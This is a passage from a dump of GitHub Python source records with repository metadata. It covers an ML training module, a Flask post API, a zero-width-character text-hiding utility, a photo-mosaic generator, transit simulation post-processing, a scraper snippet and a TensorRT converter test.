\"/exports/eddie/scratch/s1027820/chopped_array/data_excluding_{}/\"\n\nfor cell_line in cell_lines:\n cmd = \"rsync -a \" + EXISTING_DIR.format(cell_line) + \" \" + NEW_DIR_NAME.format(cell_line_to_rm)\n sys.stdout.write(cmd + \"\\n\")\n","repo_name":"CarragherLab/2018-08_transfer_ML_between_cell_lines","sub_path":"CNN/create_rsync_commands_leave_one_out.py","file_name":"create_rsync_commands_leave_one_out.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"26541142137","text":"import pytorch_lightning as pl\nimport torch\nimport torchmetrics\nfrom torchvision.models import resnet34\n\n\nclass ModifiedResNet(torch.nn.Module):\n def __init__(self, lr):\n super().__init__()\n self.resnet = resnet34(pretrained=True)\n num_last_features = self.resnet.fc.out_features\n self.regressor = torch.nn.Linear(num_last_features, 2)\n self.lr = lr\n\n def forward(self, image):\n outputs = self.resnet(image)\n logits = self.regressor(outputs)\n return torch.nn.functional.softmax(logits, 1)\n\n\nclass MaskModel(pl.LightningModule):\n def __init__(self, lr):\n super().__init__()\n self.resnet = ModifiedResNet(lr)\n self.save_hyperparameters()\n\n def training_step(self, batch, batch_idx):\n output = self.resnet(batch[0])\n # predicted = torch.argmax(torch.Tensor(output), dim=1)\n # predicted = predicted.to(torch.int64)\n cross_entropy = torch.nn.CrossEntropyLoss()\n loss = cross_entropy(output, batch[1])\n self.log(\"train_loss\", loss)\n predicted = torch.argmax(output, dim=1)\n # acc = torchmetrics.Accuracy().to(device=\"cuda\")\n # value = acc(predicted, batch[1])\n # self.log(\"train_accuracy\", value)\n return loss\n\n def validation_step(self, batch, batch_idx):\n output = self.resnet(batch[0])\n # predicted = torch.argmax(torch.Tensor(output), dim=1)\n # predicted = predicted.to(torch.int64)\n cross_entropy = torch.nn.CrossEntropyLoss()\n loss = cross_entropy(output, batch[1])\n self.log(\"val_loss\", loss)\n predicted = torch.argmax(output, dim=1)\n # acc = torchmetrics.Accuracy().to(device=\"cuda\")\n # value = acc(predicted, batch[1])\n # self.log(\"val_accuracy\", value)\n\n def test_step(self, batch, batch_idx):\n output = self.resnet(batch[0])\n # predicted = torch.argmax(torch.Tensor(output), dim=1)\n # predicted = predicted.to(torch.int64)\n cross_entropy = torch.nn.CrossEntropyLoss()\n loss = cross_entropy(output, batch[1])\n self.log(\"test_loss\", loss)\n predicted = torch.argmax(output, dim=1)\n acc = torchmetrics.Accuracy().to(device=\"cuda\")\n value = acc(predicted, batch[1])\n self.log(\"test_accuracy\", value)\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.hparams.lr)\n","repo_name":"Issei0804-ie/waiwai","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21301960952","text":"from flask import jsonify\nfrom flask_restful import reqparse, abort, Resource\nfrom data import db_session\nfrom data.posts import Post\nfrom data.users import User\nimport requests as rq\nimport json\n\n\ndb_session.global_init(\"db/blogs.sqlite\")\n\n\ndef get_user(token):\n session = db_session.create_session()\n return session.query(User).filter(User.api_token == token).first()\n\n\ndef abort_if_unauthorized(token):\n if not get_user(token):\n abort(401)\n\n\ndef abort_if_cant_read(post_id, token):\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n user_id = get_user(token).id\n if post.is_private:\n if post.author != user_id and post.reply_to.author != user_id:\n abort(403, message=f\"Can't read post {post_id}\")\n\n\ndef abort_if_not_owner(post_id, token):\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n user_id = get_user(token).id\n if post.author != user_id:\n abort(403, message=f\"Not owner of post {post_id}\")\n\n\ndef abort_if_post_not_found(post_id):\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n if not post:\n abort(404, message=f\"Post {post_id} not found\")\n\n\nclass PostResource(Resource):\n def get(self, post_id):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n args = parser.parse_args()\n token = args['token']\n abort_if_unauthorized(token)\n abort_if_post_not_found(post_id)\n abort_if_cant_read(post_id, token)\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n resp = post.to_dict(only=('id', 'content', 'user.id', 'user.username', 'is_private'))\n resp['tags'] = post.tags.split()\n resp['likes'] = len(post.liked)\n return jsonify(resp)\n\n def post(self, post_id):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n parser.add_argument('action', required=True, type=str)\n args = parser.parse_args()\n token = args['token']\n abort_if_unauthorized(token)\n abort_if_post_not_found(post_id)\n abort_if_cant_read(post_id, token)\n user = get_user(token)\n if args['action'] == 'like':\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n if not post:\n abort(404)\n if user.id in post.liked:\n post.liked = post.liked ^ {user.id}\n else:\n post.liked = post.liked | {user.id}\n session.commit()\n return jsonify({'success': 'OK'})\n else:\n return jsonify({'BAD_PARAMETER': 'action'})\n\n def delete(self, post_id):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n args = parser.parse_args()\n abort_if_unauthorized(args['token'])\n abort_if_post_not_found(post_id)\n abort_if_not_owner(post_id, args['token'])\n session = db_session.create_session()\n post = session.query(Post).get(post_id)\n post.content = '[DELETED]'\n post.tags = ''\n post.liked = set()\n post.attachments = set()\n session.commit()\n return jsonify({'success': 'OK'})\n\n\nclass PostListResource(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n parser.add_argument('limit', type=int)\n parser.add_argument('offset', type=int)\n parser.add_argument('author', type=int)\n args = parser.parse_args()\n abort_if_unauthorized(args['token'])\n user = get_user(args['token'])\n session = db_session.create_session()\n limit = int(args['limit']) if args['limit'] else 20\n out = []\n if args['offset']:\n posts = session.query(Post).order_by(Post.id.desc()).filter(Post.id < int(args['offset']))\n else:\n posts = session.query(Post).order_by(Post.id.desc())\n for post in posts:\n if (not post.is_private or post.user == user or post.reply_to.user == user) and (not args['author'] or post.author == int(args['author'])):\n resp = post.to_dict(only=('id', 'content', 'user.id', 'user.username', 'is_private'))\n resp['tags'] = post.tags.split()\n resp['likes'] = len(post.liked)\n out += [resp]\n if len(out) == limit:\n break\n return jsonify(out)\n\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('token', required=True, type=str)\n parser.add_argument('content', required=True, type=str)\n parser.add_argument('tags', required=False, type=str)\n parser.add_argument('is_private', required=False, type=bool)\n parser.add_argument('reply_to', required=False, type=int)\n args = parser.parse_args()\n abort_if_unauthorized(args['token'])\n session = db_session.create_session()\n post = Post(content=args['content'], author=get_user(args['token']).id)\n if args['tags'] is not None:\n post.tags = ' ' + args['tags']\n if args['is_private'] is not None:\n post.is_private = args['is_private']\n if args['reply_to'] is not None:\n abort_if_post_not_found(args['reply_to'])\n abort_if_cant_read(args['reply_to'], args['token'])\n reply_post = session.query(Post).get(args['reply_to'])\n if reply_post:\n post.reply_to_id = args['reply_to']\n if reply_post.is_private:\n post.is_private = True\n else:\n lpost = session.query(Post).order_by(Post.id.desc()).first()\n if lpost:\n post.reply_to_id = lpost.id + 1\n else:\n post.reply_to_id = 1\n session.add(post)\n session.commit()\n return jsonify({'post_id': post.id})\n","repo_name":"ArtyZn/mutblr","sub_path":"data/posts_resources.py","file_name":"posts_resources.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8914580830","text":"_ZERO_WIDTH_NON_JOINER = '‌'\n_ZERO_WIDTH_JOINER = '‍'\n_ZERO_WIDTH_SPACE = '​'\n_ZERO_WIDTH_NO_BREAK_SPACE = ''\n_LEFT_TO_RIGHT_MARK = '‎'\n_RIGHT_TO_LEFT_MARK = '‏'\n\nzeroWidthDict = {\n _LEFT_TO_RIGHT_MARK: _LEFT_TO_RIGHT_MARK,\n _RIGHT_TO_LEFT_MARK: _RIGHT_TO_LEFT_MARK,\n _ZERO_WIDTH_NON_JOINER: _ZERO_WIDTH_NON_JOINER,\n _ZERO_WIDTH_JOINER: _ZERO_WIDTH_JOINER,\n _ZERO_WIDTH_NO_BREAK_SPACE: _ZERO_WIDTH_NO_BREAK_SPACE,\n _ZERO_WIDTH_SPACE: _ZERO_WIDTH_SPACE\n}\n\n_Quinary2ZeroMap: list = list(zeroWidthDict.values())\n_Zero2QuinaryMap: dict = {index: values for values, index in enumerate(_Quinary2ZeroMap)}\n\n\ndef _is_visible(char: str) -> bool:\n return char not in _Zero2QuinaryMap\n\n\ndef _find_first_visible(text: str):\n for index, char in enumerate(text):\n if _is_visible(char):\n return index\n return -1\n\n\ndef _to_any_base(number: int, radix: int) -> str:\n digits = \"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+-={}[]|\\\\:\\\";\\'<>?,./`~\"\n max_radix = len(digits)\n if 2 > radix > max_radix:\n raise ValueError(f\"Limit exceeded.\")\n\n remstack = []\n\n while number > 0:\n rem = number % radix\n remstack.append(rem)\n number = number // radix\n\n result = \"\"\n while len(remstack):\n result += digits[remstack.pop()]\n\n return result\n\n\ndef t2z(t: str) -> str:\n z = ''\n char: str\n for char in list(t):\n base10 = ord(char)\n base5 = _to_any_base(int(base10), 5)\n zero = ''.join([_Quinary2ZeroMap[int(each)] for each in list(base5)])\n z = z + zero + _ZERO_WIDTH_SPACE\n return z[:-1]\n\n\ndef z2t(z: str) -> str:\n t = ''\n if len(z) == 0:\n return t\n\n char: str\n for char in z.split(_ZERO_WIDTH_SPACE):\n base5 = ''.join([str(_Zero2QuinaryMap[each]) for each in list(char)])\n t += chr(int(base5, 5))\n return t\n\n\ndef encode(visible: str, hidden: str) -> str:\n hid2z = t2z(hidden)\n if len(visible) == 0:\n return hid2z\n\n e = f\"{visible[:1]}{hid2z}{visible[1:]}\"\n return e\n\n\ndef extract(text: str) -> dict[str]:\n first_visible = _find_first_visible(text)\n second_visible = _find_first_visible(text[first_visible + 1:])\n visible = ''\n hidden = ''\n\n for char in text[:second_visible + 1]:\n if _is_visible(char):\n visible += char\n else:\n hidden += char\n\n for char in text[second_visible - 1:]:\n if _is_visible(char):\n visible += char\n\n return {\"visible\": visible,\n \"hidden\": hidden}\n\n\ndef decode(visible: str) -> str:\n return z2t(extract(visible)['hidden'])\n\n\ndef split(text: str) -> str:\n second_visible = _find_first_visible(text[1:])\n result = text[:second_visible + 1]\n split_list = text[second_visible + 1:]\n for char in split_list:\n result += f\"{char}{_ZERO_WIDTH_SPACE}\"\n return result\n","repo_name":"Ancaea/zero-width-lib-python","sub_path":"src/zero_width_lib.py","file_name":"zero_width_lib.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"3345874703","text":"from PIL import ImageFile, Image\nfrom multiprocessing import Process\nfrom multiprocessing import cpu_count\nfrom multiprocessing import Queue\nimport sys\nimport os\nimport cv2\n\n#########################################################################################################\n# Program Parameters\n# These can be changed here to improve on processing speed\n# Dimensions, being the height and width of the images to be used as tiles in mosaic\nTILE_DIM = 50\n\n# Null value\nNULL = None\t\n\n# The zoom constant that controls the scale of the mosaic compared to the target\nZOOM = 8\t\t\n\n# Used to scale the tile down for easier processing, cannot be one\nRES = 5\t\n\n# Runnning processes\nPROCESSES = max(cpu_count() - 1, 1)\n\n# File to be output in working directory\nOUT_FILE = 'mosaic_image.jpeg'\n\n# Use the RES constant to scale the dimensions while keeping it from being scaled by one\nNEW_TILE_DIM = TILE_DIM / max(min(RES, TILE_DIM), 1)\n\n\n#########################################################################################################\n\nclass Target:\n # Constructor \n def __init__(self, target_dir):\n self.target_dir = target_dir\n\n # Converts the target image to RGB\n def process_target(self):\n print('Processing target image...')\n image = Image.open(self.target_dir)\n width = image.size[0] * ZOOM\n height = image.size[1] * ZOOM\n dim = (width, height)\n \n # Resize the image according to the ZOOM constant\n large_image = image.resize(dim, Image.ANTIALIAS)\n\n small_dim = (int(width / NEW_TILE_DIM), int(height / NEW_TILE_DIM))\n small_image = large_image.resize(small_dim, Image.ANTIALIAS)\n\n # Convert it to a tuple that containts the RGB colours\n image_data = (large_image.convert('RGB'), small_image.convert('RGB'))\n\n print('Processing of target image complete.')\n\n return image_data\n\n# Utilises multithreading inorder to speed up the configuration of the mosaic\ndef place_tiles(queue, result, crop_data):\n make_mosaic = MosaicMaker(crop_data)\n while_var = True\n while while_var:\n try:\n img_data, img_location = queue.get(True)\n if img_data == NULL:\n break\n index = make_mosaic.fit_cropped_img(img_data)\n result.put((img_location, index))\n except KeyboardInterrupt:\n pass\n\n # let the result handler know that this worker has finished everything\n result.put((NULL, NULL))\n \n\n\n#########################################################################################################\nclass Tiles:\n # Constructor \n def __init__(self, image_dir):\n self.image_dir = image_dir\n\n # Takes the batch of images from the folder, crops them converts them to RBG\n def __process_imgs(self, img_path):\n try:\n image = Image.open(img_path) \n \n #Images are truncated due to the size of some, being too large to process\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n \n # Input images must be square, so take the smaller of the two and crop it to match\n width = image.size[0]\n height = image.size[1]\n min_dim = min(width, height) \n \n # Create a larger and smaller image\n large_dim = (TILE_DIM, TILE_DIM)\n small_dim = (int(TILE_DIM/NEW_TILE_DIM), int(TILE_DIM/NEW_TILE_DIM))\n \n # Resize to get the images\n large_image = image.resize(large_dim, Image.ANTIALIAS)\n small_image = image.resize(small_dim, Image.ANTIALIAS)\n \n return (large_image.convert('RGB'), small_image.convert('RGB'))\n except:\n return (NULL, NULL)\n # An empty tuple is returned if the image cannot be used\n\n # Collect the images to be used in the mosaic from the folders\n def get_tiles(self):\n large_images = []\n small_images = []\n\n print('Folder {} currently being read...'.format(self.image_dir))\n\n # Extensively search all the files in the image directory\n # And update user on progress\n for root, subFolders, files in os.walk(self.image_dir):\n for img in files:\n # Prints out the name of each file read\n print('Reading {:40.40}'.format(img), flush=True, end='\\r')\n file_path = os.path.join(root, img)\n large_image, small_image = self.__process_imgs(file_path)\n if large_image:\n large_images.append(large_image)\n small_images.append(small_image)\n\n\n print('A total of {} image files processed.'.format(len(large_images)))\n\n return (large_images, small_images)\n \n#########################################################################################################\n\n# Basically the starting function for the entire program\ndef mosaic(image_path, tiles_path):\n image_data = Target(image_path).process_target()\n input_data = Tiles(tiles_path).get_tiles()\n create(image_data, input_data)\n\n\n#########################################################################################################\nclass MosaicMaker:\n # Constructor\n def __init__(self, crop_data):\n self.crop_data = crop_data\n\n # Compares images and calculates the difference between the RBG values of the tile \n # and the specific region of the target image\n def __compare_imgs(self, img1, img2, stop):\n img_diff = 0\n for x in range(len(img1)):\n img_diff += ((img1[x][0] - img2[x][0])**2 + (img1[x][1] - img2[x][1])**2 + (img1[x][2] - img2[x][2])**2)\n if img_diff > stop:\n # If the difference is bigger than the max value, then there is no need to continue\n return img_diff\n return img_diff\n\n # Determine the best location for the tile in the mosaic image by determining the best possible index\n def fit_cropped_img(self, img_data):\n best_index = 0\n minimum = sys.maxsize\n index = 0\n \n for tile_data in self.crop_data:\n diff = self.__compare_imgs(img_data, tile_data, minimum)\n if diff < minimum:\n minimum = diff\n best_index = index\n index = index + 1\n return best_index\n\n\n#########################################################################################################\n\n# A simple class that tracks the progress of the mosaic in percent completed\nclass Progress:\n def __init__(self, total):\n self.total = total\n self.updated = 0\n\n def update(self):\n self.updated += 1\n print(\"Progress: {:04.1f}%\".format(100 * self.updated / self.total), flush=True, end='\\r')\n \n\n#########################################################################################################\n\nclass MosaicImage:\n # Constructor\n def __init__(self, original):\n self.image = Image.new(original.mode, original.size)\n self.x_count = int(original.size[0] / TILE_DIM)\n self.y_count = int(original.size[1] / TILE_DIM)\n self.total_tiles = self.x_count * self.y_count\n\n # Use paste from the python image library to put the tiles together to make the mosaic\n def add_img(self, tile_data, location):\n image = Image.new('RGB', (TILE_DIM, TILE_DIM))\n image.putdata(tile_data)\n self.image.paste(image, location)\n\n # Saves the image in the directory given \n def save(self, final_path):\n self.image.save(final_path)\n\n#########################################################################################################\n# Build the mosaic using processes \ndef build_mosaic(result, total_large, large_original):\n mosaic = MosaicImage(large_original)\n \n running_processes = PROCESSES\n while True:\n try:\n img_location, best_index = result.get()\n \n if img_location == NULL:\n running_processes -= 1\n if not running_processes:\n break\n else:\n tile_data = total_large[best_index]\n mosaic.add_img(tile_data, img_location)\n\n except KeyboardInterrupt:\n pass\n\n \n mosaic.save(OUT_FILE)\n im = Image.open(OUT_FILE)\n im.show()\n print('\\nFinished, output is in\\n', OUT_FILE)\n\n#########################################################################################################\n\n# Primary function that handles the target image and the folder of given images\ndef create(original_image, all_tiles):\n print('Creating your mosaic...')\n large_original, small_orginal = original_image\n large_tiles, small_tiles = all_tiles\n\n mosaic = MosaicImage(large_original)\n\n total_large = [list(tiles.getdata()) for tiles in large_tiles]\n total_small = [list(tiles.getdata()) for tiles in small_tiles]\n\n queue = Queue(PROCESSES)\t\n result = Queue()\n\n try:\n # This begins the process that builds the mosaic\n Process(target = build_mosaic, args = (result, total_large, large_original)).start()\n\n # This starts the processes that put the tiles together\n for x in range(PROCESSES):\n Process(target = place_tiles, args=(queue, result, total_small)).start()\n\n # Keep track of the progress of the mosaic\n completed = Progress(mosaic.x_count * mosaic.y_count)\n for x in range(mosaic.x_count):\n for y in range(mosaic.y_count):\n large_set = (x * TILE_DIM, y * TILE_DIM, (x + 1) * TILE_DIM, (y + 1) * TILE_DIM)\n small_set = (x * TILE_DIM/NEW_TILE_DIM, y * TILE_DIM/NEW_TILE_DIM, (x + 1) * TILE_DIM/NEW_TILE_DIM, (y + 1) * TILE_DIM/NEW_TILE_DIM)\n queue.put((list(small_orginal.crop(small_set).getdata()), large_set))\n \n completed.update()\n\n finally:\n # End the processes by sending them null values\n for n in range(PROCESSES):\n queue.put((NULL, NULL))\n\n\n#########################################################################################################\n\n# The actual starting point for the program\n# Only runs once\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print('Usage: {} \\r'.format(sys.argv[0]))\n sys.exit()\n \n print(\"Variables can be editied by changing the values within the program in a text editor\\n\")\n print(\"Visit the top of the program file for the variables\\n\")\n condition = str(input(\"Resize image for faster processing? (yes or no)\\n\"))\n if (condition == \"yes\"):\n original = Image.open(sys.argv[1])\n new = original.copy()\n original = original.save(\"original.jpg\")\n \n print(\"Image will be resized\\n\")\n print(\"Original image will be renamed original.jpg\\n\")\n scale = float(input(\"Enter the desired scale, decimals recommended\\n\"))\n \n height = new.size[1]\n width = new.size[0]\n \n height = int(height - (height * scale)) \n width = int(width - (width * scale))\n \n dim = (width, height)\n new = new.resize(dim)\n \n new = new.save(sys.argv[1])\n \n mosaic(sys.argv[1], sys.argv[2]) \n \n\n\n","repo_name":"DaronWuzHere/Creations","sub_path":"run-mosaic/mosaic.py","file_name":"mosaic.py","file_ext":"py","file_size_in_byte":11301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70030969796","text":"import pandas as pd\npd.options.mode.chained_assignment = None\nimport numpy as np\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--date\", type=str, default=\"2021-08-s20\", help=\"date\")\n# parser.add_argument(\"--sim\", type=str, default=\"transit-sim-date\", help=\"simulation folder\")\n# parser.add_argument(\"--BTE_data\", type=str, default=\"BTE/edge_speed_by_sim.pkl\", help=\"BTE data\")\nargs = parser.parse_args()\n\n## bus stop output containing delay and person load information\nstopO = pd.read_csv(\"../transit-sim-date/busstop_output.csv\",sep=';')\nstopO=stopO[[\"stopinfo_id\",\"stopinfo_busStop\",\"stopinfo_started\",\"stopinfo_arrivalDelay\",\n \"stopinfo_ended\",\"stopinfo_delay\",\"stopinfo_initialPersons\",\n \"stopinfo_loadedPersons\",\"stopinfo_unloadedPersons\",\n \"stopinfo_lane\",\"stopinfo_pos\",\"stopinfo_parking\"]]\nstopO=stopO.sort_values([\"stopinfo_id\",\"stopinfo_started\"])\n\n## trajectory for all vehicles during the simulation time interval\nmotion = pd.read_csv(\"../transit-sim-date/trajectory_output.csvmotionState.csv\",sep=';',low_memory=False)\nvehtype = pd.read_csv(\"../transit-sim-date/trajectory_output.csvactorConfig.csv\",sep=';')\nvehref = pd.read_csv(\"../transit-sim-date/trajectory_output.csvvehicle.csv\",sep=';')\n\n# extract the output values for buses\nvehref['vehicle_ref'] = vehref['vehicle_ref'].astype('str')\nbus = vehref\n# bus=vehref[vehref['vehicle_ref'].apply(lambda x: len(x)>20)]\nbusref=bus[['vehicle_ref','vehicle_id','vehicle_actorConfig']]\nbusref.rename(columns={'vehicle_actorConfig' : 'actorConfig_id'},inplace = True)\n# join busref and vehtype by the same column 'actorConfig_id'\nbusinfo=pd.merge(busref, vehtype, on='actorConfig_id')\n\ntraj=motion.loc[motion.motionState_vehicle.isin(businfo.vehicle_id), ]\ntraj=traj[['motionState_vehicle','motionState_time','motionState_speed','motionState_acceleration']]\ntraj=traj.sort_values(['motionState_vehicle','motionState_time'])\ntraj.rename(columns={'motionState_vehicle' : 'vehicle_id','motionState_time':'time','motionState_speed':'speed',\n 'motionState_acceleration':'acceleration'},inplace = True)\n# UNIT: time:milliseconds, speed:0.01m/s, acceleration:0.0001m/s^2\ntrajectory=pd.merge(traj, businfo, on='vehicle_id')\ntrajectory=trajectory.drop(['vehicle_id'],axis=1)\n#group dataframe into multiple dataframe as a dict by bus name\ntrajectory=dict(tuple(trajectory.groupby('vehicle_ref')))\n\n# date = '2021-08-20'\ntrip_asm = pd.read_csv('../Pre-processing/trip-assignments/trip-asm-{}.csv'.format(args.date))\n\ndef time_conv(x):\n h, m, s = x.split(':')\n return int(h) * 3600 + int(m) * 60 + int(s)\n\nstopO['gtfs_time'] = stopO['stopinfo_started'] - stopO['stopinfo_arrivalDelay'].apply(float)\n\nfinal_stopO = pd.DataFrame()\nfor veh_id in stopO['stopinfo_id'].unique():\n df_stop_veh = stopO[stopO['stopinfo_id'] == veh_id]\n trip_asm_veh = trip_asm[trip_asm['vid'] == int(veh_id)]\n traj_veh = trajectory[str(veh_id)]\n for idx, row in trip_asm_veh.iterrows():\n df_stop_trip = df_stop_veh[(df_stop_veh['gtfs_time'] >= time_conv(row['gtfs_time_start'])) & \n (df_stop_veh['gtfs_time'] < time_conv(row['gtfs_time_end']))]\n df_stop_trip['trip_id'] = int(row['trip_id'])\n final_stopO = pd.concat([final_stopO, df_stop_trip], ignore_index=True)\n \n actual_start_time, actual_end_time = df_stop_trip['stopinfo_started'].min(), df_stop_trip['stopinfo_started'].max()\n traj_trip = traj_veh[(traj_veh['time'] >= actual_start_time*1000) & (traj_veh['time'] <= actual_end_time*1000)]\n if len(traj_trip) > 0:\n traj_trip.to_csv('./trip-level-output/trajectory_{}.csv'.format(row['trip_id']), index=None)\n \nfinal_stopO.to_csv(\"./trip-level-output/busstop_info.csv\",index=False)\n# write final stop output ","repo_name":"smarttransit-ai/transit-gym","sub_path":"background_traffic_elimination_v2/Post-processing/ouputProcess.py","file_name":"ouputProcess.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"6795883024","text":"# importing required modules \nfrom zipfile import ZipFile \nimport xmltodict, json\nimport os\n\n# specifying the zip file name \nfile_name = \"export-full-1556040614144.zip\"\n\nrootdir = os.path.dirname(os.path.realpath(__file__))\nfor subdir, dirs, files in os.walk(rootdir):\n\tfor file in files:\n\t\tif file.endswith(\"zip\"):\n\t\t\tfile_name = file\n\n # opening the zip file in READ mode \nwith ZipFile(file_name, 'r') as zip: \n # extracting all the files \n print('Extracting all the files now...') \n zip.extractall() \n print('Done!')\n\nmasterlist = []\nexception = 1\nsuccess = 1\nfor subdir, dirs, files in os.walk(rootdir):\n\tfor file in files:\n\t\tif file == \"metadata.xml\":\n\t\t\tdocument_file = open(os.path.join(subdir, file), \"r\") # Open a file in read-only mode\n\t\t\toriginal_doc = document_file.read() # read the file object\n\t\t\tdocument = xmltodict.parse(original_doc) # Parse the read document string\n\t\t\tstrdict = json.dumps(document)\n\t\t\td = json.loads(strdict)\n\t\t\tmasterlist.append(d)\n\n\nprint(masterlist[50])\nprint(len(masterlist))\n","repo_name":"maheenakbar/GLOS","sub_path":"metadata_test/metadata_zip_script.py","file_name":"metadata_zip_script.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10992070643","text":"import requests\nfrom lxml import etree\n\n# url='https://read.douban.com/kind/100'\nurl='http://www.yaobiaozhun.com/yd2015'\nr=requests.get(url)\n# r.encoding='utf-8'\n\ncontent=etree.HTML(r.content)\nfor box in content.xpath('//div[@class=\"cms_list\"]/table/tr[position()>1]'):\n box.xpath('./td[1]/a/@href').extract()\n\n\n\n# res=content.xpath('//div[@class=\"cms_list\"]/table/tr')\n# ur=content.xpath(\"//a[contains(text(),'下页')]/@href\")\n# page = 'http://www.yaobiaozhun.com/yd2015/' + ur[0]\n# print(page)\n\n# for i in range(2, 22):\n# print(content.xpath('//div[@class=\"cms_list\"]/table/tr[%d]/td[1]/a/text()' % i))\n# n=n+1\n# print(n)\n# print(content.xpath('//div[@class=\"cms_list\"]/table/tbody/tr[2]/td[1]/a'))\n# print(content.xpath(\"/html/body/div/div[3]/div[3]/table/tbody/tr[2]/td[1]/a\"))\n# print(content.xpath('/html/body/div/div/article/div[2]/div[1]/ul/li[1]/div[2]/div[2]/a/text()'))\n# print(content.xpath('//ul[@class=\"list-lined ebook-list column-list\"]/li[1]/div[2]/div[2]/a/text()'))\n# open('/Users/shiyijie/Desktop/1.txt','w').write(result)\n# //*[@id=\"wrap\"]/div[3]/div[2]/div[3]/pre/center[1]","repo_name":"yijieshi/ScrapySpider","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1632315047","text":"from PIL import Image, ImageDraw,ImageFont\r\nimport cv2\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom PIL import Image, ImageTk\r\nroot = Tk()\r\n\r\nroot.filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select A file\",\r\n filetypes=((\"png files\", \".png\"),\r\n (\"jpg files\", \"jpg\"),\r\n (\"all files\", \".\")))\r\nmy_label = Label(root, text=root.filename).pack()\r\nupload_img = ImageTk.PhotoImage(Image.open(root.filename))\r\nupload_img_label = Label(image=upload_img).pack()\r\n\r\nroot.mainloop()\r\n\r\nimage = Image.open(root.filename)\r\nfont1 = ImageFont.truetype(\"arial.ttf\",20)\r\ndraw = ImageDraw.Draw(image)\r\npoints1 = 000,000\r\npoints2 = 00,30\r\nprint(\"enter the name and age of person\")\r\nname = input()\r\n\r\nprint(\"enter the age of person\")\r\nage = input()\r\n\r\ndraw.text(points1,name,\"white\",font=font1)\r\n\r\ndraw.text(points2,age,\"white\",font=font1)\r\nimage.show()\r\n\r\n","repo_name":"Aishu11-bij/WaterMark","sub_path":"textmark.py","file_name":"textmark.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3811088685","text":"import unittest\nfrom functools import partial\n\nimport numpy as np\nfrom program_config import ProgramConfig, TensorConfig\nfrom trt_layer_auto_scan_test import TrtLayerAutoScanTest\n\nimport paddle.inference as paddle_infer\n\n\nclass TrtConvertSetValue(TrtLayerAutoScanTest):\n def is_program_valid(self, program_config: ProgramConfig) -> bool:\n return True\n\n def sample_program_configs(self):\n def generate_input1():\n return np.random.random([2, 3, 3]).astype(np.float32)\n\n def generate_input2():\n return np.random.random([2, 2, 3]).astype(np.float32)\n\n for update_scalar in [True, False]:\n self.update_scalar = update_scalar\n set_value_inputs = {}\n if update_scalar:\n set_value_inputs = {\n \"Input\": [\"input_data\"],\n }\n else:\n set_value_inputs = {\n \"Input\": [\"input_data\"],\n \"ValueTensor\": [\"update_data\"],\n }\n ops_config = [\n {\n \"op_type\": \"set_value\",\n \"op_inputs\": set_value_inputs,\n \"op_outputs\": {\"Out\": [\"input_data\"]},\n \"op_attrs\": {\n \"axes\": [1],\n \"starts\": [0],\n \"ends\": [2],\n \"steps\": [1],\n \"decrease_axes\": [],\n \"values\": [0.0],\n },\n },\n {\n \"op_type\": \"relu\",\n \"op_inputs\": {\n \"X\": [\"input_data\"],\n },\n \"op_outputs\": {\"Out\": [\"output_data\"]},\n \"op_attrs\": {},\n },\n ]\n\n ops = self.generate_op_config(ops_config)\n if update_scalar:\n program_config = ProgramConfig(\n ops=ops,\n weights={},\n inputs={\n \"input_data\": TensorConfig(\n data_gen=partial(generate_input1)\n ),\n },\n outputs=[\"output_data\"],\n )\n else:\n program_config = ProgramConfig(\n ops=ops,\n weights={},\n inputs={\n \"input_data\": TensorConfig(\n data_gen=partial(generate_input1)\n ),\n \"update_data\": TensorConfig(\n data_gen=partial(generate_input2)\n ),\n },\n outputs=[\"output_data\"],\n )\n\n yield program_config\n\n def sample_predictor_configs(self, program_config):\n def generate_dynamic_shape(attrs):\n if self.update_scalar:\n self.dynamic_shape.min_input_shape = {\n \"input_data\": [2, 3, 3],\n }\n self.dynamic_shape.max_input_shape = {\n \"input_data\": [3, 3, 4],\n }\n self.dynamic_shape.opt_input_shape = {\n \"input_data\": [3, 3, 3],\n }\n else:\n self.dynamic_shape.min_input_shape = {\n \"input_data\": [2, 3, 3],\n \"update_data\": [2, 2, 3],\n }\n self.dynamic_shape.max_input_shape = {\n \"input_data\": [3, 3, 4],\n \"update_data\": [3, 2, 4],\n }\n 